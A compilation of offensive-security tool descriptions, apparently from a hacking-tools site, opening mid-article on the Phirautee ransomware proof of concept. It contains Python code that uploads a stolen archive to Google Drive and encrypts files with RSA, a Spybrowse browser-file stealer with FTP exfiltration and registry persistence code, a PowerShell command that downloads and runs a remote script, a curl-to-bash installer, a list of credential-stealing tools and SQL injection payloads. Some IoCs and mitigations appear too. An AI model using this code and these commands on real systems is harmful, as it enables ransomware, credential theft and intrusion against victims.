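To make the flow above concrete, here is a minimal Python sketch of how the refresh token obtained in Step 11 can be exchanged for an access token and used to upload a file through the Google Drive REST API. Phirautee itself does the equivalent from PowerShell; the CLIENT_ID, CLIENT_SECRET and REFRESH_TOKEN values below are placeholders you must supply yourself, and the upload shown is a simple, non-resumable one.

# Hypothetical sketch: exchange the OAuth refresh token for an access token and
# upload a file via the Google Drive REST API (simple media upload).
import requests

CLIENT_ID = "<your-client-id>"          # placeholder
CLIENT_SECRET = "<your-client-secret>"  # placeholder
REFRESH_TOKEN = "<your-refresh-token>"  # placeholder, obtained in Step 11

def get_access_token():
    resp = requests.post("https://accounts.google.com/o/oauth2/token", data={
        "client_id": CLIENT_ID,
        "client_secret": CLIENT_SECRET,
        "refresh_token": REFRESH_TOKEN,
        "grant_type": "refresh_token",
    })
    resp.raise_for_status()
    return resp.json()["access_token"]

def upload_file(path, token):
    # The media upload endpoint turns the posted bytes into a new Drive file.
    with open(path, "rb") as fh:
        resp = requests.post(
            "https://www.googleapis.com/upload/drive/v3/files?uploadType=media",
            headers={"Authorization": "Bearer " + token},
            data=fh.read(),
        )
    resp.raise_for_status()
    return resp.json()["id"]

if __name__ == "__main__":
    print(upload_file("steal.zip", get_access_token()))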



Use of Symmetric Keys & Anonymous SMTP Service
  • Phirautee uses two unique symmetric keys
    • One for the private key of the certificate that’s being generated on the user machine.
    • The other one for uploading exfiltrated data on Google Drive
  • The private keys are sent to Pokemail as encrypted zip files.
  • Phirautee uses Pokemail services to distribute the attack infrastructure by creating a random, location-based email address.


  • Uses a 2048-bit RSA key to encrypt files on the infected machine (see the sketch below).
  • The private key of the certificate is sent to the attacker protected with a pre-shared secret, i.e. a symmetric key.
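Phirautee implements this in PowerShell; purely as an illustration of the envelope-encryption pattern described above (a 2048-bit RSA key wrapping a per-file symmetric key), here is a Python sketch using the cryptography library. It is not Phirautee's actual code; only the ".phirautee" extension follows the detection notes above.

# Illustrative sketch of envelope (hybrid) encryption with a 2048-bit RSA key.
# Not Phirautee's actual PowerShell implementation.
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes
from cryptography.fernet import Fernet

# Generate a 2048-bit RSA key pair (in the attack scenario only the private key
# material leaves the host, protected with a pre-shared secret).
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

def encrypt_file(path):
    # Encrypt the file contents with a fresh symmetric key...
    sym_key = Fernet.generate_key()
    with open(path, "rb") as fh:
        ciphertext = Fernet(sym_key).encrypt(fh.read())
    with open(path + ".phirautee", "wb") as fh:
        fh.write(ciphertext)
    # ...and wrap the symmetric key with the RSA public key.
    return public_key.encrypt(
        sym_key,
        padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                     algorithm=hashes.SHA256(), label=None),
    )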

IoCs for Phirautee
File paths:
C:\temp\cert.cer
c:\temp\sys.txt
c:\temp\backup.zip
c:\temp\sys1.txt
c:\temp\steal.zip
C:\users\$env:USERNAME\PhirauteeBackground-3.jpg

MD5s:
77EA9D33D144072F7B35C10691124D16
4E123FF3A7833F0C8AC6F749D337444D

Domains used for exfil:
https://smtp.pokemail.net
https://www.googleapis.com
https://accounts.google.com
https://raw.githubusercontent.com

Registry files:
HKCU:\Control Panel\Desktop

Mitigation Strategies
  • Network segmentation and detection of lateral movement. Follow principle of least privilege access or restrict access to sensitive servers. Make use of MFA on all important portals.
  • Disable PowerShell for standard domain users and perform application whitelisting.
  • Frequent network wide backups (if possible offline).
  • Apply patches and have a vulnerability management program.
  • Have a dedicated incident response team and develop a plan for ransomware events.
  • Invest in a good IDS/IPS/EDR/AV/CASB product.
  • Validate the effectiveness of your defense tools and technologies through pre-approved offensive exercise.
  • Organise phishing and user education training sessions for your employees.
  • Have cyber insurance to help cover costs in case you need to pay the ransom. Furthermore, get your insurance policies reviewed to make sure there are no holes.
  • Take help from local feds for the decryption keys.

Contribution & License
MIT License
Copyright (c) 2020 Viral Maniar
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Any suggestions or ideas for this tool are welcome - just tweet me on @ManiarViral


CheckXSS - Detect XSS vulnerability in Web Applications


Detect XSS vulnerabilities in web applications.

Screenshots


Easy Installation
As simple as below, Just one line of code:
curl -L -s https://raw.githubusercontent.com/Jewel591/CheckXSS/master/docs/install.sh|bash

Usage Instructions
python3.6 checkxss.py -h


Supports the POST and GET request methods, as well as parameter injection detection in the Cookie, Referer and User-Agent fields. For example, test the returnUrl parameter in POST data:
python3.6 checkxss.py -u "https://example.com/login.do" --data="returnUrl=utest" -p returnUrl


Features
  1. URL-encoding bypass (illustrated in the sketch below)
  2. Unicode encoding of HTML tag attribute values for bypass
  3. HTML encoding of HTML tag attribute values for bypass
  4. Flexible replacement of ( ) ' " characters for bypass
  5. Case-variation bypass
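As a rough illustration of the encodings these bypass features work with (not CheckXSS's internal logic), the Python sketch below shows how a simple payload looks after URL encoding and HTML-entity encoding.

# Illustration only: what URL-encoded and HTML-entity-encoded XSS payloads look like.
# CheckXSS generates and tests such variants automatically; this is not its code.
import html
import urllib.parse

payload = "<script>alert(1)</script>"

url_encoded = urllib.parse.quote(payload)        # %3Cscript%3Ealert%281%29%3C/script%3E
html_encoded = html.escape(payload, quote=True)  # &lt;script&gt;alert(1)&lt;/script&gt;

print(url_encoded)
print(html_encoded)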

Contributing
Contributions, issues and feature requests are welcome!
Feel free to check the issues page

Maintainers
@Jewel591


Spybrowse - Code Developed To Steal Certain Browser Config Files (History, Preferences, Etc)


Be sure to change the FTP variables throughout the code; these variables contain the username, password and IP address of the FTP server that receives the files.
This code will do the following:
  1. Copy itself into the %TMP% directory & name itself ursakta.exe
  2. Add a registry entry to execute itself each time the user logs in (see the sketch after this list)
  3. Verify which browser the user is using (Chrome, Firefox or Brave)
  4. Search for files within the Chrome, Firefox, or Brave browser directories
  5. Create a directory on the FTP server, then send the files from the browser's directory to the FTP server
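Spybrowse implements step 2 in C; purely as an illustration of the same Run-key persistence concept, here is a minimal Windows-only Python sketch using the standard winreg module. The value name and command shown are placeholders that mirror the behaviour described above.

# Illustration of the Run-key persistence concept from step 2 (Windows only).
# Spybrowse itself does this in C; the value name/command below are placeholders.
import os
import winreg

def add_run_key(name, command):
    key = winreg.OpenKey(
        winreg.HKEY_CURRENT_USER,
        r"Software\Microsoft\Windows\CurrentVersion\Run",
        0,
        winreg.KEY_SET_VALUE,
    )
    winreg.SetValueEx(key, name, 0, winreg.REG_SZ, command)
    winreg.CloseKey(key)

# Example: re-launch the copied executable at each logon.
# add_run_key("ursakta", os.path.expandvars(r"%TMP%\ursakta.exe"))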

Cross Compiling with MingW on Linux
Install command with Apt:
  • sudo apt-get install mingw-w64
64-bit:
  • x86_64-w64-mingw32-gcc *input file* -o *output file* -lwininet -lversion
32-bit:
  • i686-w64-mingw32-gcc *input file* -o *output file* -lwininet -lversion

From Victim's Perspective:
Registry entry:


File activity:



FTP connection:


Detection Rate:
This detection rate is after stripping the executable with strip --strip-all *filename.c*




PowerSharpPack - Many Useful Offensive CSharp Projects Wrapped Into PowerShell For Easy Usage


Many useful offensive CSharp projects wrapped into PowerShell for easy usage.
Why? In my personal opinion offensive PowerShell is not dead, despite AMSI, Script Block Logging, Constrained Language Mode and other protection features. Any of these mechanisms can be bypassed. Since most new, innovative offensive security projects are written in C#, I decided to make them usable in PowerShell as well.

So what did I basically do here?
  1. First of all, clone each C# repo.
  2. Set the class and main methods public.
  3. For some projects I merged pull requests with new features or bug fixes, or had to remove Environment.Exit statements so that the whole PowerShell process is not killed for missing parameters and so on.
  4. Afterwards, compile each binary.
  5. Encode the compiled binary as Base64 and load it in PowerShell via [System.Reflection.Assembly]::Load([Convert]::FromBase64String()).
It's an easy but, for many repos, time-consuming process (the sketch below illustrates the packaging step).
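As a rough illustration of step 5 (not PowerSharpPack's own tooling), the Python helper below Base64-encodes a compiled .NET assembly and emits the corresponding PowerShell reflective-load line. The input and output paths are supplied by the user; the example file names are hypothetical.

# Hypothetical helper mirroring the packaging step described above:
# Base64-encode a compiled assembly and write a PowerShell reflective loader line.
import base64
import sys

def make_loader(assembly_path, out_path):
    with open(assembly_path, "rb") as fh:
        b64 = base64.b64encode(fh.read()).decode()
    loader = (
        '$a = [System.Reflection.Assembly]::Load('
        '[Convert]::FromBase64String("' + b64 + '"))\n'
    )
    with open(out_path, "w") as fh:
        fh.write(loader)

if __name__ == "__main__":
    # e.g. make_loader("Seatbelt.exe", "Invoke-Seatbelt.ps1")  -- hypothetical names
    make_loader(sys.argv[1], sys.argv[2])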
Which tools are included?
Internalmonologue
Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS @Credit to: https://github.com/eladshamir/Internal-Monologue
Seatbelt
Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. @Credit to: https://github.com/GhostPack/Seatbelt
SharpWeb
.NET 2.0 CLR project to retrieve saved browser credentials from Google Chrome, Mozilla Firefox and Microsoft Internet Explorer/Edge. @Credit to: https://github.com/djhohnstein/SharpWeb
UrbanBishop
Creates a local RW section in UrbanBishop and then maps that section as RX into a remote process. Shellcode loading made easy. @Credit to: https://github.com/FuzzySecurity/Sharp-Suite
SharpUp
SharpUp is a C# port of various PowerUp functionality. @Credit to: https://github.com/GhostPack/SharpUp
Rubeus
Rubeus is a C# toolset for raw Kerberos interaction and abuses. @Credit to: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/
SharPersist
Windows persistence toolkit written in C#. @Credit to: https://github.com/fireeye/SharPersist
Sharpview
C# implementation of harmj0y's PowerView @Credit to: https://github.com/tevora-threat/SharpView
winPEAS
Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz @Credit to: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Lockless
Lockless allows for the copying of locked files. @Credit to: https://github.com/GhostPack/Lockless
SharpChromium
.NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins. @Credit to: https://github.com/djhohnstein/SharpChromium
SharpDPAPI
SharpDPAPI is a C# port of some Mimikatz DPAPI functionality. @Credit to: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/
SharpShares
Enumerate all network shares in the current domain. Also, can resolve names to IP addresses. @Credit to: https://github.com/djhohnstein/SharpShares
SharpSniper
Find specific users in active directory via their username and logon IP address @Credit to: https://github.com/HunnicCyber/SharpSniper
SharpSpray
SharpSpray a simple code set to perform a password spraying attack against all users of a domain using LDAP and is compatible with Cobalt Strike. @Credit to: https://github.com/jnqpblc/SharpSpray
Watson
Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities @Credit to: https://github.com/rasta-mouse/Watson
Grouper2
Find vulnerabilities in AD Group Policy @Credit to: https://github.com/l0ss/Grouper2
Tokenvator
A tool to elevate privilege with Windows Tokens @Credit to: https://github.com/0xbadjuju/Tokenvator
SauronEye
Search tool to find specific files containing specific words, i.e. files containing passwords. @Credit to: https://github.com/vivami/SauronEye
Just load the main script with
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')
and choose the tool as switch parameter for example:
PowerSharpPack -Seatbelt -Command "all"


If you want to pass multiple parameters to the binary you can just use quotation marks like:
PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"
If you don't want to load all binaries for whatever reason, you can use the per-binary PowerShell scripts located in the PowerSharpBinaries folder.
Projects which are also available as standalone powershell script:
SharpCloud
Simple C# for checking for the existence of credential files related to AWS, Microsoft Azure, and Google Compute. @Credit to: https://github.com/chrismaddalena/SharpCloud
SharpSSDP
SSDP Service Discovery @Credit to: https://github.com/rvrsh3ll/SharpSSDP
DAFT
DAFT: Database Audit Framework & Toolkit @Credit to: https://github.com/NetSPI/DAFT
Get-RBCD-Threaded
Tool to discover Resource-Based Constrained Delegation attack paths in Active Directory environments @Credit to: https://github.com/FatRodzianko/Get-RBCD-Threaded
SharpGPO-RemoteAccessPolicies
A C# tool for enumerating remote access policies through group policy. @Credit to: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies
SharpAllowedToAct
Computer object takeover through Resource-Based Constrained Delegation (msDS-AllowedToActOnBehalfOfOtherIdentity) @Credit to: https://github.com/pkb1s/SharpAllowedToAct
WireTap
.NET 4.0 Project to interact with video, audio and keyboard hardware. @Credit to: https://github.com/djhohnstein/WireTap
SharpClipboard
C# Clipboard Monitor @Credit to: https://github.com/slyd0g/SharpClipboard
SharpPrinter
Discover Printers + check for vulns @Credit to: https://github.com/rvrsh3ll/SharpPrinter
SharpHide
Tool to create hidden registry keys. @Credit to: https://github.com/outflanknl/SharpHide
SpoolSample
PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well. @Credit to: https://github.com/leechristensen/SpoolSample
SharpGPOAbuse
SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO. @Credit to: https://github.com/FSecureLABS/SharpGPOAbuse
SharpDump
SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality. @Credit to: https://github.com/GhostPack/SharpDump
SharpHound3
C# Data Collector for the BloodHound Project, Version 3 @Credit to: https://github.com/BloodHoundAD/SharpHound3
SharpLocker
SharpLocker helps get current user credentials by popping a fake Windows lock screen, all output is sent to Console which works perfect for Cobalt Strike. @Credit to: https://github.com/Pickfordmatt/SharpLocker
Eyewitness
EyeWitness is designed to take screenshots of websites, provide some server header info, and identify default credentials if possible. @Credit to: https://github.com/FortyNorthSecurity/EyeWitness
FakeLogonScreen
Fake Windows logon screen to steal passwords @Credit to: https://github.com/bitsadmin/fakelogonscreen
P0wnedShell
PowerShell Runspace Post Exploitation Toolkit @Credit to: https://github.com/Cn33liz/p0wnedShell
Safetykatz
SafetyKatz is a combination of slightly modified version of @gentilkiwi's Mimikatz project and @subTee's .NET PE Loader I modified this one again with my own obfuscated Mimikatz Version. @Credit to: https://github.com/GhostPack/SafetyKatz
InveighZero
Windows C# LLMNR/mDNS/NBNS/DNS/DHCPv6 spoofer/man-in-the-middle tool . @Credit to: https://github.com/Kevin-Robertson/InveighZero
SharpSploit
SharpSploit is a .NET post-exploitation library written in C#. @Credit to: https://github.com/cobbr/SharpSploit
Snaffler
A tool for pentesters to help find delicious candy, by @l0ss and @Sh3r4 ( Twitter: @/mikeloss and @/sh3r4_hax ). @Credit to: https://github.com/SnaffCon/Snaffler
BadPotato
itm4ns Printspoofer in C#. @Credit to: https://github.com/BeichenDream/BadPotato
BetterSafetyKatz
Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi GitHub repo, runtime patches signatures and uses SharpSploit DInvoke to PE-Load into memory. @Credit to: https://github.com/Flangvik/BetterSafetyKatz


Urlbuster - Powerful Mutable Web Directory Fuzzer To Bruteforce Existing And/Or Hidden Files Or Directories


Powerful web directory fuzzer to locate existing and/or hidden files or directories.
Similar to dirb or gobuster, but with a lot of mutation options.

Installation
pip install urlbuster

Features
  • Proxy support
  • Cookie support
  • Basic Auth
  • Digest Auth
  • Retries (for slow servers)
  • Persistent and non-persistent HTTP connection
  • Request methods: GET, POST, PUT, DELETE, PATCH, HEAD, OPTIONS
  • Custom HTTP header
  • Mutate POST, PUT and PATCH payloads
  • Mutate with different request methods
  • Mutate with different HTTP headers
  • Mutate with different file extensions
  • Mutate with and without trailing slashes
  • Enumerate GET parameter values

Usage
usage: urlbuster [options] -w <str>/-W <file> BASE_URL
urlbuster -h, --help
urlbuster -V, --version

URL bruteforcer to locate existing and/or hidden files or directories.

Similar to dirb or gobuster, but also allows to iterate over multiple HTTP request methods,
multiple useragents and multiple host header values.

positional arguments:
BASE_URL The base URL to scan.

required arguments:
-w str, --word str Word to use.
-W f, --wordlist f Path to wordlist to use.

optional global arguments:
-n, --new Use a new connection for every request.
If not specified persistent http connection will be used for all requests.
Note, using a new connection will decrease performance,
but ensure to have a clean state on every request.
A persistent connection on the other hand will use any additional cookie values
it has received from a previous request.
-f, --follow Follow redirects.
-k, --insecure Do not verify TLS certificates.
-v, --verbose Show also missed URLs.
--code str [str ...] HTTP status code to treat as success.
You can use a '.' (dot) as a wildcard.
Default: 2.. 3.. 403 407 411 426 429 500 505 511
--payload p [p ...] POST, PUT and PATCH payloads for all requests.
Note, multiple values are allowed for multiple payloads.
Note, if duplicates are specified, the last one will overwrite.
See --mpayload for mutations.
Format: <key>=<val> [<key>=<val>]
--header h [h ...] Custom http header string to add to all requests.
Note, multiple values are allowed for multiple headers.
Note, if duplicates are specified, the last one will overwrite.
See --mheaders for mutations.
Format: <key>:<val> [<key>:<val>]
--cookie c [c ...] Cookie string to add to all requests.
Format: <key>=<val> [<key>=<val>]
--proxy str Use a proxy for all requests.
Format: http://<host>:<port>
Format: http://<user>:<pass>@<host>:<port>
Format: https://<host>:<port>
Format: https://<user>:<pass>@<host>:<port>
Format: socks5://<host>:<port>
Format: socks5://<user>:<pass>@<host>:<port>
--auth-basic str Use basic authentication for all requests.
Format: <user>:<pass>
--auth-digest str Use digest authentication for all requests.
Format: <user>:<pass>
--timeout sec Connection timeout in seconds for each request.
Default: 5.0
--retry num Connection retries per request.
Default: 3
--delay sec Delay between requests to not flood the server.
--output file Output file to write results to.

optional mutating arguments:
The following arguments will increase the total number of requests to be made by
applying various mutations and testing each mutation on a separate request.

--method m [m ...] List of HTTP methods to test each request against.
Note, each supplied method will double the number of requests.
Supported methods: GET POST PUT DELETE PATCH HEAD OPTIONS
Default: GET
--mpayload p [p ...] POST, PUT and PATCH payloads to mutate all requests..
Note, multiple values are allowed for multiple payloads.
Format: <key>=<val> [<key>=<val>]
--mheader h [h ...] Custom http header string to add to mutate all requests.
Note, multiple values are allowed for multiple headers.
Format: <key>:<val> [<key>:<val>]
--ext ext [ext ...] List of file extensions to add to words for testing.
Note, each supplied extension will double the number of requests.
Format: .zip [.pem]
--slash str Append or omit a trailing slash to URLs to test.
Note, a slash will be added after the extensions if they are specified as well.
Note, using 'both' will double the number of requests.
Options: both, yes, no
Default: no

misc arguments:
-h, --help Show this help message and exit
-V, --version Show version information

examples

urlbuster -W /path/to/words http://example.com/
urlbuster -W /path/to/words http://example.com:8000/
urlbuster -k -W /path/to/words https://example.com:10000/

Mutation example
Some websites behave differently for the same path depending on the specified useragent.
$ urlbuster \
-W /usr/share/dirb/wordlists/common.txt \
--mheader 'User-Agent:Googlebot/2.1 (+http://www.googlebot.com/bot.html)' \
--method 'POST,GET,DELETE,PUT,PATCH' \
http://www.domain.tld/
(URLBUSTER ASCII-art banner)

0.5.0 by cytopia

SETTINGS
Base URL: https://www.everythingcli.org/
Valid codes: 2.., 3.., 403, 407, 411, 426, 429, 500, 505, 511
Connection: Non-persistent
Redirects: Don't follow
Payloads: None
Timeout: 5.0s
Retries: 3
Delay: None

MUTATIONS
Mutating headers: 2
Mutating payloads: 0 (POST)
Methods: 5 (POST, GET, DELETE, PUT, PATCH)
Slashes: no
Extensions: 1 (empty extension)
Words: 4614

TOTAL REQUESTS: 46140
START TIME: 2020-01-29 08:52:12


--------------------------------------------------------------------------------
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0

[301] [GET] http://domain.tld/robots.txt

--------------------------------------------------------------------------------
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Googlebot/2.1 (+http://www.googlebot.com/bot.html)

[200] [GET] http://domain.tld/robots.txt
[301] [POST] http://domain.tld/robots.txt
[301] [GET] http://domain.tld/robots.txt
[301] [DELETE] http://domain.tld/robots.txt
[301] [PUT] http://domain.tld/robots.txt
[301] [PATCH] http://domain.tld/robots.txt

Examples

Default usage

Basic
$ urlbuster \
-W /path/to/wordlist.txt \
http://www.domain.tld/

Proxy through Burpsuite
$ urlbuster \
-W /path/to/wordlist.txt \
--proxy 'http://localhost:8080' \
http://www.domain.tld/

Save results to file
$ urlbuster \
-W /path/to/wordlist.txt \
--output out.txt \
http://www.domain.tld/

Scan behind Basic Auth
$ urlbuster \
-W /path/to/wordlist.txt \
--auth-basic 'user:pass' \
http://www.domain.tld/

Use session cookie
$ urlbuster \
-W /path/to/wordlist.txt \
--cookie 'PHPSESSID=a79b00e7-035a-2bb4-352a-439d855feabf' \
http://www.domain.tld/

Find files

Find files in root directory
$ urlbuster \
-W /path/to/wordlist.txt \
--code 200 301 302 \
--ext .zip .tar .tar.gz .gz .rar \
http://www.domain.tld/

Find files in sub directory
$ urlbuster \
-W /path/to/wordlist.txt \
--code 200 301 302 \
--ext .zip .tar .tar.gz .gz .rar \
http://www.domain.tld/wp-content/

Advanced usage

Bruteforce query parameter
$ urlbuster \
-W /path/to/wordlist.txt \
--method GET \
--code 200 301 302 \
http://www.domain.tld/search?q=

Bruteforce POST requests
$ urlbuster \
-W /path/to/wordlist.txt \
--code 200 301 302 \
--method POST \
--payload \
'user=somename' \
'pass=somepass' \
'mail=some@mail.tld' \
'submit=yes' \
http://www.domain.tld/

Bruteforce mutated POST requests
$ urlbuster \
-w index.php \
--code 200 301 302 \
--method POST \
--mpayload \
'user=somename1' \
'user=somename2' \
'user=somename3' \
'pass=somepass1' \
'pass=somepass2' \
'pass=somepass3' \
'mail=some@mail1.tld' \
'mail=some@mail2.tld' \
'mail=some@mail3.tld' \
'submit=yes' \
http://www.domain.tld/wp-admin/

Useragent SQL injections
$ urlbuster \
-W /path/to/wordlist.txt \
--code 5.. \
--method GET POST \
--mheader \
"User-Agent: ;" \
"User-Agent: ' or \"" \
"User-Agent: -- or #" \
"User-Agent: ' OR '1" \
"User-Agent: ' OR 1 -- -" \
"User-Agent: \" OR 1 = 1 -- -" \
"User-Agent: '='" \
"User-Agent: 'LIKE'" \
"User-Agent: '=0--+" \
"User-Agent: OR 1=1" \
"User-Agent: ' OR 'x'='x" \
"User-Agent: ' AND id IS NULL; --" \
http://www.domain.tld/

Find potential vhosts
$ urlbuster \
-w / \
--method GET POST \
--mheader \
"Host: internal1.lan" \
"Host: internal2.lan" \
"Host: internal3.lan" \
"Host: internal4.lan" \
"Host: internal5.lan" \
"Host: internal6.lan" \
http://10.0.0.1

cytopia sec tools
Below is a list of sec tools and docs I am maintaining.
Name           | Category            | Language   | Description
offsec         | Documentation       | Markdown   | Offsec checklist, tools and examples
header-fuzz    | Enumeration         | Bash       | Fuzz HTTP headers
smtp-user-enum | Enumeration         | Python 2+3 | SMTP users enumerator
urlbuster      | Enumeration         | Python 2+3 | Mutable web directory fuzzer
netcat         | Pivoting            | Python 2+3 | Cross-platform netcat
badchars       | Reverse Engineering | Python 2+3 | Badchar generator
fuzza          | Reverse Engineering | Python 2+3 | TCP fuzzing tool

